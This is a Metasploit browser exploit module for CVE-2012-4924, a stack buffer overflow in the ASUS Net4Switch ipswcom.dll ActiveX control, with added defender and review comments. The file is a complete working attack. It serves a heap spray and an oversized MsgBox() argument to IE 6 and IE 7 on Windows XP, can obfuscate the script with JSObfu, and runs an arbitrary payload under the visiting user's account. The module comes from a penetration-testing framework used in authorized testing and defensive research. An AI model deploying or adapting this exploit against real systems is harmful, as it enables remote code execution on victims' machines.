GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/windows/browser/asus_net4switch_ipswcom.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
# Browser exploit module for the ASUS Net4Switch ipswcom.dll ActiveX control
# (CVE-2012-4924, OSVDB 79438). When a supported browser requests the module's
# URI it is served an HTML page whose script instantiates the control and calls
# its MsgBox() method with an oversized second argument; the stack buffer
# overflow reached through CxDbgPrint() then transfers control into the payload
# that the preceding JavaScript heap spray placed in memory.
#
# Defender notes:
# - Only IE 6 / IE 7 on Windows XP SP3 user agents are served the page (unless
#   a target is chosen explicitly); every other browser receives a 404.
# - Blocking the control's CLSID (listed in the =begin/=end notes at the end of
#   this file) with the ActiveX kill bit, or removing ipswcom.dll, removes the
#   MsgBox() entry point this module relies on.
# - The unobfuscated page contains the literal strings
#   "new ActiveXObject(\"ipswcom.IPSWComItf\")" and "heapLib.ie", which are
#   usable for proxy/IDS matching; with OBFUSCATE set the script is passed
#   through JSObfu and those literals are no longer guaranteed to appear.
#
# NOTE(review): this listing was rendered without its original indentation.
# The `html.gsub(/\t\t/, '')` call below implies the upstream heredocs are
# tab-indented, so the whitespace of the served page may differ from this copy.
class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpServer::HTML

  # Registers module metadata, payload constraints, target profiles and the
  # OBFUSCATE option with the framework.
  #
  # @param info [Hash] metadata supplied by the framework, merged via update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => "ASUS Net4Switch ipswcom.dll ActiveX Stack Buffer Overflow",
        'Description' => %q{
          This module exploits a vulnerability found in ASUS Net4Switch's ipswcom.dll
          ActiveX control. A buffer overflow condition is possible in multiple places due
          to the use of the CxDbgPrint() function, which allows remote attackers to gain
          arbitrary code execution under the context of the user.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Dmitriy Evdokimov', # Initial discovery, poc
          'sinn3r' # Metasploit
        ],
        'References' => [
          [ 'CVE', '2012-4924' ],
          [ 'OSVDB', '79438' ],
          [ 'URL', 'http://dsecrg.com/pages/vul/show.php?id=417' ]
        ],
        'Payload' => {
          # The payload is embedded in the page via unescape(); a NUL byte
          # would terminate the JavaScript string early.
          'BadChars' => "\x00",
          'StackAdjustment' => -3500,
        },
        'DefaultOptions' => {
          'EXITFUNC' => "seh",
          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
        },
        'Platform' => 'win',
        # Per-target values are hex strings interpolated verbatim into the
        # JavaScript: 'Offset' is the length of the NOP prefix placed before
        # the payload in each spray block, 'Max' sizes the padding appended to
        # the second MsgBox() argument. Target 0 ('Automatic') carries neither
        # and is resolved from the User-Agent by get_target.
        'Targets' => [
          [ 'Automatic', {} ],
          [ 'IE 6 on Windows XP SP3', { 'Max' => '0x40000', 'Offset' => '0x500' } ],
          [ 'IE 7 on Windows XP SP3', { 'Max' => '0x40000', 'Offset' => '0x500' } ]
        ],
        'Privileged' => false,
        'DisclosureDate' => '2012-02-17',
        'DefaultTarget' => 0,
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    # OBFUSCATE (default false) routes the generated script through JSObfu
    # in on_request_uri.
    register_options(
      [
        OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation'])
      ]
    )
  end

  # Picks the target profile for one request.
  #
  # @param agent [String, nil] the request's User-Agent header (nil when absent)
  # @return [Msf::Module::Target, nil] the user-selected target when it is not
  #   'Automatic'; otherwise targets[1] (IE 6 on XP SP3) or targets[2] (IE 7 on
  #   XP SP3) matched from the User-Agent, or nil when the browser is not
  #   supported (the caller then answers with a 404)
  #
  # NOTE(review): `and` is used for boolean logic here; `&&` is the
  # conventional form and avoids precedence surprises. A nil agent is safe
  # because `nil =~ regex` evaluates to nil, so the method falls through to nil.
  def get_target(agent)
    return target if target.name != 'Automatic'

    if agent =~ /NT 5\.1/ and agent =~ /MSIE 6/
      return targets[1] # IE 6 on Windows XP SP3
    elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 7/
      return targets[2] # IE 7 on Windows XP SP3
    else
      return nil
    end
  end

  # Handles each HTTP request to the module's URI: resolves the target from the
  # User-Agent, builds the heap-spray and trigger script, optionally obfuscates
  # it, and sends the resulting HTML page to the client.
  #
  # @param cli the client connection the response is written to
  # @param request [Rex::Proto::Http::Request] the incoming request; only its
  #   User-Agent header is consulted
  # @return [void]
  def on_request_uri(cli, request)
    agent = request.headers['User-Agent']
    my_target = get_target(agent)

    # Unsupported browsers get a plain 404, so the page is never served to them.
    if my_target.nil?
      print_error("Browser not supported: #{agent.to_s}")
      send_not_found(cli)
      return
    end

    # Encoded payload rendered as a %uXXXX escape sequence for unescape().
    # NOTE(review): the endianness lookup uses `target.arch` (the user-selected
    # target, which is 'Automatic' by default) rather than `my_target.arch`;
    # presumably the framework falls back to the module's arch here — confirm.
    p = payload.encoded
    js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(target.arch))
    nops = Rex::Text.to_unescape(make_nops(4))
    # Random 1..100-character alphabetic name for the NOP string variable.
    randnop = rand_text_alpha(rand(100) + 1)

    # heapLib-based spray. Each block is the NOP prefix (my_target['Offset']
    # characters), the payload, then NOP fill up to 0x800 characters; the block
    # is doubled to 0x40000 characters, trimmed, and allocated 0x300 times.
    spray = <<-JS
      var heap_obj = new heapLib.ie(0x20000);
      var code = unescape("#{js_code}");
      var #{randnop} = "#{nops}";
      var nops = unescape(#{randnop});

      while (nops.length < 0x80000) nops += nops;
      var offset = nops.substring(0, #{my_target['Offset']});
      var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length);

      while (shellcode.length < 0x40000) shellcode += shellcode;
      var block = shellcode.substring(0, (0x80000-6)/2);

      heap_obj.gc();

      for (var i=1; i < 0x300; i++) {
        heap_obj.alloc(block);
      }
    JS

    # Prepends the heapLib helper script; :noobfu leaves it unobfuscated here
    # so that the single OBFUSCATE pass below decides for the whole script.
    spray = heaplib(spray, { :noobfu => true })

    # Trigger: instantiate the control and call MsgBox() with the second
    # argument padded out to my_target['Max'] (generate_padding returns s/2
    # characters, each %uXXXX escape being one character).
    js = <<-JS
      var obj = new ActiveXObject("ipswcom.IPSWComItf");

      #{spray}

      function generate_padding(d, s) {
        var tmp = d;
        while (tmp.length < s) {
          tmp += tmp;
        }
        var buf = tmp.substring(0, s/2);
        tmp = null;
        return buf;
      }

      var arg1 = generate_padding(unescape("%u4141"), 4);

      var arg2 = "A"; // Expands to 0x0041, helps us to align the stack
      arg2 += generate_padding(unescape("%u4343"), 2680);
      arg2 += unescape("%u4242%u4242");
      arg2 += unescape("%u0d0d%u0d0d");
      arg2 += generate_padding(unescape("%u0d0d"), #{my_target['Max']}-arg2.length);

      obj.MsgBox(arg1, arg2, 2);
    JS

    # obfuscate on demand
    # memory_sensitive: true is passed to JSObfu; presumably it restricts
    # transformations that would change the spray's string layout — verify
    # against the JSObfu documentation.
    if datastore['OBFUSCATE']
      js = ::Rex::Exploitation::JSObfu.new(js)
      js.obfuscate(memory_sensitive: true)
    end

    # Minimal page: no markup beyond a single <script> block.
    html = <<-EOS
      <html>
        <head>
        </head>
        <body>
          <script>
            #{js}
          </script>
        </body>
      </html>
    EOS

    # Strips the double-tab heredoc indentation from the served page.
    html = html.gsub(/\t\t/, '')

    print_status("Sending HTML")
    send_response(cli, html, { 'Content-Type' => 'text/html' })
  end
end
=begin
Download:
http://www.softpedia.com/progDownload/ASUS-Net4Switch-Download-203619.html
clsid:1B9E86D8-7CAF-46C8-9938-569B21E17A8E
C:\Program Files\ASUS\Net4Switch\ipswcom.dll
.text:10030523 push ecx
.text:10030524 mov eax, [ebp+arg_C]
.text:10030527 mov [ebp+var_4], eax
.text:1003052A cmp [ebp+var_4], 0
.text:1003052E jz short loc_10030541 <-- uType 10h
.text:10030530 cmp [ebp+var_4], 1
.text:10030534 jz short loc_10030573 <-- uType 44h
.text:10030536 cmp [ebp+var_4], 2
.text:1003053A jz short loc_100305A5 <-- CxDbgPrint
...
.text:100305A5 loc_100305A5: ; CODE XREF: MsgBox+1Aj
.text:100305A5 mov eax, [ebp+lpText]
.text:100305A8 push eax
.text:100305A9 push offset aIpsw_alertS ; "[IPSW_alert] = %s"
.text:100305AE push 0FFh
.text:100305B3 call ds:CxDbgPrint
=end